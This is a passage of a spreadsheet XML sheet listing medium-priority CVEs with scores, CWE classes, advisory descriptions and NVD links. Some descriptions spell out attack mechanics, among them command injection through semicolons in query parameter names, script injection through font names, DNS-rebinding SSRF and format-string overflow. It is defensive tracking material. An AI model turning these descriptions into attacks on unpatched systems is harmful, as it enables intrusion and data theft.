      <c r="J2425" s="5" t="inlineStr"/>
      <c r="K2425" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2425" s="5" t="inlineStr">
        <is>
          <t>n8n versions before 1.123.73, 2.35.4, and 2.36.2 contain a remote code execution vulnerability in the Git node. The node reset a fixed list of command-bearing configuration keys before each operation, but that list did not cover the content-filter and merge-driver key families. A repository with local configuration setting one of those keys together with a matching attribute pattern causes git to execute the configured command during an ordinary Add, Commit, Checkout, or Pull operation. The command runs as the n8n process user.</t>
        </is>
      </c>
      <c r="M2425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85168</t>
        </is>
      </c>
    </row>
    <row r="2426">
      <c r="A2426" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85182</t>
        </is>
      </c>
      <c r="C2426" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2426" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2426" s="5" t="inlineStr"/>
      <c r="F2426" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2426" s="5" t="inlineStr"/>
      <c r="H2426" s="5" t="inlineStr"/>
      <c r="I2426" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2426" s="5" t="inlineStr"/>
      <c r="K2426" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2426" s="5" t="inlineStr">
        <is>
          <t>vhr through commit 03abbd3 fails to verify that the account ID in PUT /hr/pass requests belongs to the authenticated caller. Authenticated attackers can change arbitrary account passwords by supplying a target account ID and that account's current password in the request body.</t>
        </is>
      </c>
      <c r="M2426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85182</t>
        </is>
      </c>
    </row>
    <row r="2427">
      <c r="A2427" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85619</t>
        </is>
      </c>
      <c r="C2427" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2427" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2427" s="5" t="inlineStr"/>
      <c r="F2427" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2427" s="5" t="inlineStr"/>
      <c r="H2427" s="5" t="inlineStr"/>
      <c r="I2427" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2427" s="5" t="inlineStr"/>
      <c r="K2427" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2427" s="5" t="inlineStr">
        <is>
          <t>AppFlowy-Cloud 0.9.64 fails to verify that requested collab objects belong to the workspace in authorization checks, allowing attackers to access documents and database rows across workspaces. Attackers can supply a victim's object ID with their own workspace ID to bypass access controls and read, modify, or delete cross-workspace data.</t>
        </is>
      </c>
      <c r="M2427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85619</t>
        </is>
      </c>
    </row>
    <row r="2428">
      <c r="A2428" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86083</t>
        </is>
      </c>
      <c r="C2428" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2428" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2428" s="5" t="inlineStr"/>
      <c r="F2428" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2428" s="5" t="inlineStr"/>
      <c r="H2428" s="5" t="inlineStr"/>
      <c r="I2428" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2428" s="5" t="inlineStr"/>
      <c r="K2428" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L2428" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M2428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86083</t>
        </is>
      </c>
    </row>
    <row r="2429">
      <c r="A2429" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86207</t>
        </is>
      </c>
      <c r="C2429" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2429" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2429" s="5" t="inlineStr"/>
      <c r="F2429" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2429" s="5" t="inlineStr"/>
      <c r="H2429" s="5" t="inlineStr"/>
      <c r="I2429" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J2429" s="5" t="inlineStr"/>
      <c r="K2429" s="5" t="inlineStr">
        <is>
          <t>CWE-305</t>
        </is>
      </c>
      <c r="L2429" s="5" t="inlineStr">
        <is>
          <t>An authentication bypass in N-central &lt; 2026.3 HF 3 leads to authentication bypass in internal only APIs</t>
        </is>
      </c>
      <c r="M2429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86207</t>
        </is>
      </c>
    </row>
    <row r="2430">
      <c r="A2430" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86494</t>
        </is>
      </c>
      <c r="C2430" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2430" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2430" s="5" t="inlineStr"/>
      <c r="F2430" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2430" s="5" t="inlineStr"/>
      <c r="H2430" s="5" t="inlineStr"/>
      <c r="I2430" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2430" s="5" t="inlineStr"/>
      <c r="K2430" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2430" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18634 cloning a whiteboard allowed unauthorized changes to links on inaccessible issues</t>
        </is>
      </c>
      <c r="M2430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86494</t>
        </is>
      </c>
    </row>
    <row r="2431">
      <c r="A2431" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86498</t>
        </is>
      </c>
      <c r="C2431" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2431" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2431" s="5" t="inlineStr"/>
      <c r="F2431" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2431" s="5" t="inlineStr"/>
      <c r="H2431" s="5" t="inlineStr"/>
      <c r="I2431" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2431" s="5" t="inlineStr"/>
      <c r="K2431" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2431" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2025.3.160480, 
2026.1.14047 pUT requests on link sub-resources allowed modification linked entities without update permission</t>
        </is>
      </c>
      <c r="M2431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86498</t>
        </is>
      </c>
    </row>
    <row r="2432">
      <c r="A2432" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87084</t>
        </is>
      </c>
      <c r="C2432" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2432" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2432" s="5" t="inlineStr"/>
      <c r="F2432" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2432" s="5" t="inlineStr"/>
      <c r="H2432" s="5" t="inlineStr"/>
      <c r="I2432" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2432" s="5" t="inlineStr"/>
      <c r="K2432" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2432" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a server-side request forgery vulnerability in Enforce.</t>
        </is>
      </c>
      <c r="M2432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87084</t>
        </is>
      </c>
    </row>
    <row r="2433">
      <c r="A2433" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87993</t>
        </is>
      </c>
      <c r="C2433" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2433" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2433" s="5" t="inlineStr"/>
      <c r="F2433" s="5" t="inlineStr"/>
      <c r="G2433" s="5" t="inlineStr"/>
      <c r="H2433" s="5" t="inlineStr"/>
      <c r="I2433" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2433" s="5" t="inlineStr"/>
      <c r="K2433" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L2433" s="5" t="inlineStr">
        <is>
          <t>The consul-template library is vulnerable to an information disclosure issue in its error handling path that may allow Vault secret values to appear in template error messages, log output, and downstream surfaces such as Nomad task events. This vulnerability (CVE-2026-87993) is fixed in consul-template 0.43.0.</t>
        </is>
      </c>
      <c r="M2433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87993</t>
        </is>
      </c>
    </row>
    <row r="2434">
      <c r="A2434" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87996</t>
        </is>
      </c>
      <c r="C2434" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2434" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2434" s="5" t="inlineStr"/>
      <c r="F2434" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2434" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2434" s="5" t="inlineStr"/>
      <c r="I2434" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2434" s="5" t="inlineStr"/>
      <c r="K2434" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-918</t>
        </is>
      </c>
      <c r="L2434" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.6 until 0.11.1, SafePlaywrightURLLoader in backend/open_webui/retrieval/web/utils.py validated a user-controlled hostname in Python and then let the Playwright browser resolve it again in the sync and async request interceptors. An authenticated user controlling authoritative DNS could return a public address to validation and an internal address to the browser, exposing responses from internal services or cloud metadata through web search or URL ingestion. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M2434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87996</t>
        </is>
      </c>
    </row>
    <row r="2435">
      <c r="A2435" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89060</t>
        </is>
      </c>
      <c r="C2435" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2435" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2435" s="5" t="inlineStr"/>
      <c r="F2435" s="5" t="inlineStr"/>
      <c r="G2435" s="5" t="inlineStr"/>
      <c r="H2435" s="5" t="inlineStr"/>
      <c r="I2435" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2435" s="5" t="inlineStr"/>
      <c r="K2435" s="5" t="inlineStr">
        <is>
          <t>CWE-551</t>
        </is>
      </c>
      <c r="L2435" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in multicluster-observability-addon. This vulnerability allows a managed-cluster identity to reference configuration resources outside its designated namespace. This can lead to the disclosure of sensitive hub Secrets to an attacker-controlled managed cluster.</t>
        </is>
      </c>
      <c r="M2435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89060</t>
        </is>
      </c>
    </row>
    <row r="2436">
      <c r="A2436" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9040</t>
        </is>
      </c>
      <c r="C2436" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2436" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2436" s="5" t="inlineStr"/>
      <c r="F2436" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2436" s="5" t="inlineStr"/>
      <c r="H2436" s="5" t="inlineStr"/>
      <c r="I2436" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2436" s="5" t="inlineStr"/>
      <c r="K2436" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L2436" s="5" t="inlineStr">
        <is>
          <t>A race condition vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform improper GPU memory processing operations to cause a denial of service or disclose sensitive information.
This issue affects Bifrost GPU Kernel Driver: from r12p0 through r49p5, from r50p0 through r51p0, from r54p1 through r54p2; Valhall GPU Kernel Driver: from r19p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r49p5, from r50p0 through r54p3, r55p0.</t>
        </is>
      </c>
      <c r="M2436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9040</t>
        </is>
      </c>
    </row>
    <row r="2437">
      <c r="A2437" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9804</t>
        </is>
      </c>
      <c r="C2437" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2437" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2437" s="5" t="inlineStr"/>
      <c r="F2437" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2437" s="5" t="inlineStr"/>
      <c r="H2437" s="5" t="inlineStr"/>
      <c r="I2437" s="5" t="inlineStr">
        <is>
          <t>2026-05-28</t>
        </is>
      </c>
      <c r="J2437" s="5" t="inlineStr"/>
      <c r="K2437" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L2437" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in KubeVirt's virt-exportserver component. An attacker with specific namespace-level access can exploit a path traversal vulnerability in the VMExport directory endpoint. By placing a symbolic link (symlink) within an exported filesystem Persistent Volume Claim (PVC) that points outside its designated mount root, the attacker can read arbitrary files from the exporter pod's filesystem. This leads to information disclosure, potentially exposing sensitive data.</t>
        </is>
      </c>
      <c r="M2437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9804</t>
        </is>
      </c>
    </row>
    <row r="2438">
      <c r="A2438" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2438" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-46418</t>
        </is>
      </c>
      <c r="C2438" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2438" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2438" s="5" t="inlineStr"/>
      <c r="F2438" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2438" s="5" t="inlineStr"/>
      <c r="H2438" s="5" t="inlineStr"/>
      <c r="I2438" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J2438" s="5" t="inlineStr"/>
      <c r="K2438" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2438" s="5" t="inlineStr">
        <is>
          <t>Westermo WeOS 5.x starting from 5.24 allows OS command injection via a media definition.</t>
        </is>
      </c>
      <c r="M2438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-46418</t>
        </is>
      </c>
    </row>
    <row r="2439">
      <c r="A2439" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16313</t>
        </is>
      </c>
      <c r="C2439" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2439" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2439" s="5" t="inlineStr"/>
      <c r="F2439" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2439" s="5" t="inlineStr"/>
      <c r="H2439" s="5" t="inlineStr"/>
      <c r="I2439" s="5" t="inlineStr">
        <is>
          <t>2026-07-28</t>
        </is>
      </c>
      <c r="J2439" s="5" t="inlineStr"/>
      <c r="K2439" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L2439" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in sg3_utils. The sg_inq command, when invoked with the --export option, outputs device identification data without sanitizing control characters in SCSI name string fields. A newline character embedded in a device-supplied name string can inject arbitrary properties into the udev device database. This could allow an attacker who can present a crafted SCSI device to execute arbitrary commands as root when the device is disconnected.</t>
        </is>
      </c>
      <c r="M2439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16313</t>
        </is>
      </c>
    </row>
    <row r="2440">
      <c r="A2440" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18621</t>
        </is>
      </c>
      <c r="C2440" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2440" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2440" s="5" t="inlineStr"/>
      <c r="F2440" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2440" s="5" t="inlineStr"/>
      <c r="H2440" s="5" t="inlineStr"/>
      <c r="I2440" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J2440" s="5" t="inlineStr"/>
      <c r="K2440" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L2440" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Data Science Pipelines (DSP). An attacker with namespace editor privileges can bypass security hardening by submitting a malicious Argo Workflow through the V1 API path. This allows the API server to create pods with elevated privileges, acting as a 'confused deputy' on behalf of the attacker. Successful exploitation grants the attacker node-root access, enabling arbitrary code execution and full control over the underlying node.</t>
        </is>
      </c>
      <c r="M2440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18621</t>
        </is>
      </c>
    </row>
    <row r="2441">
      <c r="A2441" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19387</t>
        </is>
      </c>
      <c r="C2441" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2441" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2441" s="5" t="inlineStr"/>
      <c r="F2441" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2441" s="5" t="inlineStr"/>
      <c r="H2441" s="5" t="inlineStr"/>
      <c r="I2441" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J2441" s="5" t="inlineStr"/>
      <c r="K2441" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2441" s="5" t="inlineStr">
        <is>
          <t>A heap out-of-bounds write vulnerability was found in the GStreamer gst-plugins-bad adpcmdec element when decoding IMA/DVI ADPCM audio. Insufficient validation of the per-block sample count for multi-channel streams allows a crafted WAV file to cause writes beyond the allocated output buffer. This can lead to application crash, denial of service, memory corruption, or potentially arbitrary code execution when untrusted media is processed.</t>
        </is>
      </c>
      <c r="M2441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19387</t>
        </is>
      </c>
    </row>
    <row r="2442">
      <c r="A2442" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19869</t>
        </is>
      </c>
      <c r="C2442" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2442" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2442" s="5" t="inlineStr"/>
      <c r="F2442" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2442" s="5" t="inlineStr"/>
      <c r="H2442" s="5" t="inlineStr"/>
      <c r="I2442" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2442" s="5" t="inlineStr"/>
      <c r="K2442" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2442" s="5" t="inlineStr">
        <is>
          <t>@neo4j/graphql from 5.2.0 until the patched versions fails to enforce field-level @authentication rules on root custom-resolver fields when a type-level @authentication rule is also present on the same operation type. When both a type-level @authentication (on Query/Mutation) and a field-level @authentication (on a root custom-resolver field within that type) are declared, only the type-level rule is evaluated and the field-level rule is silently discarded. As a result a stricter per-field requirement — such as an admin-role JWT claim (jwt: { roles_INCLUDES: "admin" }) — is never checked, and any client that satisfies the coarser type-level requirement can invoke the more-restricted field. No token forgery is involved: a legitimately issued, correctly signed non-admin token (e.g. roles: ["user"]) is sufficient.</t>
        </is>
      </c>
      <c r="M2442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19869</t>
        </is>
      </c>
    </row>
    <row r="2443">
      <c r="A2443" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38822</t>
        </is>
      </c>
      <c r="C2443" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2443" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2443" s="5" t="inlineStr"/>
      <c r="F2443" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2443" s="5" t="inlineStr"/>
      <c r="H2443" s="5" t="inlineStr"/>
      <c r="I2443" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2443" s="5" t="inlineStr"/>
      <c r="K2443" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2443" s="5" t="inlineStr">
        <is>
          <t>In openNDS before 11.0.0, the client_params.sh script, invoked by the openNDS daemon to serve the authenticated client status page, is vulnerable to OS command injection through crafted HTTP GET query parameter keys. An authenticated captive portal user can inject arbitrary shell commands by embedding semicolons in a URL query parameter name.</t>
        </is>
      </c>
      <c r="M2443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38822</t>
        </is>
      </c>
    </row>
    <row r="2444">
      <c r="A2444" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39924</t>
        </is>
      </c>
      <c r="C2444" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2444" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2444" s="5" t="inlineStr"/>
      <c r="F2444" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2444" s="5" t="inlineStr"/>
      <c r="H2444" s="5" t="inlineStr"/>
      <c r="I2444" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2444" s="5" t="inlineStr"/>
      <c r="K2444" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="L2444" s="5" t="inlineStr">
        <is>
          <t>Flarum before 1.8.16 contains an improper session invalidation vulnerability that allows attackers who hold a valid session token to retain full account access after a victim changes their password, because the access_tokens table is never cleared on password change events. The TokensClearer::clearPasswordTokens() function only removes rows from the password_tokens table while leaving all active session cookies and API bearer tokens intact, including long-lived RememberAccessToken entries, and administrator-forced password resets via the user update endpoint are equally ineffective at revoking attacker-held sessions.</t>
        </is>
      </c>
      <c r="M2444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39924</t>
        </is>
      </c>
    </row>
    <row r="2445">
      <c r="A2445" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42804</t>
        </is>
      </c>
      <c r="C2445" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2445" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2445" s="5" t="inlineStr"/>
      <c r="F2445" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2445" s="5" t="inlineStr"/>
      <c r="H2445" s="5" t="inlineStr"/>
      <c r="I2445" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2445" s="5" t="inlineStr"/>
      <c r="K2445" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2445" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability exists in the Bosch Sensortec BHI360 SensorAPI(C-Library) in versions up to and including commit d6b200416a.
The vulnerability is located within the FIFO parsing and debug logging subsystem inside the function bhi360_parse_debug_message() in bhi360_parse.c (lines 1852-1875). 
The parser trusts the first payload byte of a debug frame as the message length (msg_length) and copies that many bytes into a fixed-size 17-byte stack buffer (debug_msg) via memcpy without performing any bounds checking.
A locally or physically positioned attacker (e.g., via a malicious sensor, counterfeit hardware module, or a Man-in-the-Middle on the communication bus) can exploit this vulnerability by injecting a crafted debug frame with a length byte exceeding 16.
This corrupts adjacent stack data, including the saved return address.
Furthermore, because the overflowed buffer is subsequently passed to a printf-style logging sink, the attacker can supply format string specifiers (e.g., %n) to execute arbitrary code on the host microcontroller/SoC or cause a reliable system crash (Denial of Service).</t>
        </is>
      </c>
      <c r="M2445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42804</t>
        </is>
      </c>
    </row>
    <row r="2446">
      <c r="A2446" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47666</t>
        </is>
      </c>
      <c r="C2446" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2446" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2446" s="5" t="inlineStr"/>
      <c r="F2446" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2446" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2446" s="5" t="inlineStr"/>
      <c r="I2446" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2446" s="5" t="inlineStr"/>
      <c r="K2446" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2446" s="5" t="inlineStr">
        <is>
          <t>Penpot is an open-source design and prototyping platform. In versions up to and including 2.14.3, Penpot is vulnerable to stored cross-site scripting through custom font family names, which are interpolated into a @font-face CSS rule and injected into the page as HTML without sanitization. Because the backend accepts an arbitrary font-family string and the frontend writes the resulting style through innerHTML, a name containing markup such as a closing style tag followed by a script can break out of the style element and execute JavaScript on the Penpot origin. The attack is passive: any team member who opens a file referencing the malicious font triggers script execution simply by rendering the page, allowing theft of session cookies, actions performed as the victim, and access to their files and projects. This issue is fixed in version 2.15.3.</t>
        </is>
      </c>
      <c r="M2446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47666</t>
        </is>
      </c>
    </row>
    <row r="2447">
      <c r="A2447" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48766</t>
        </is>
      </c>
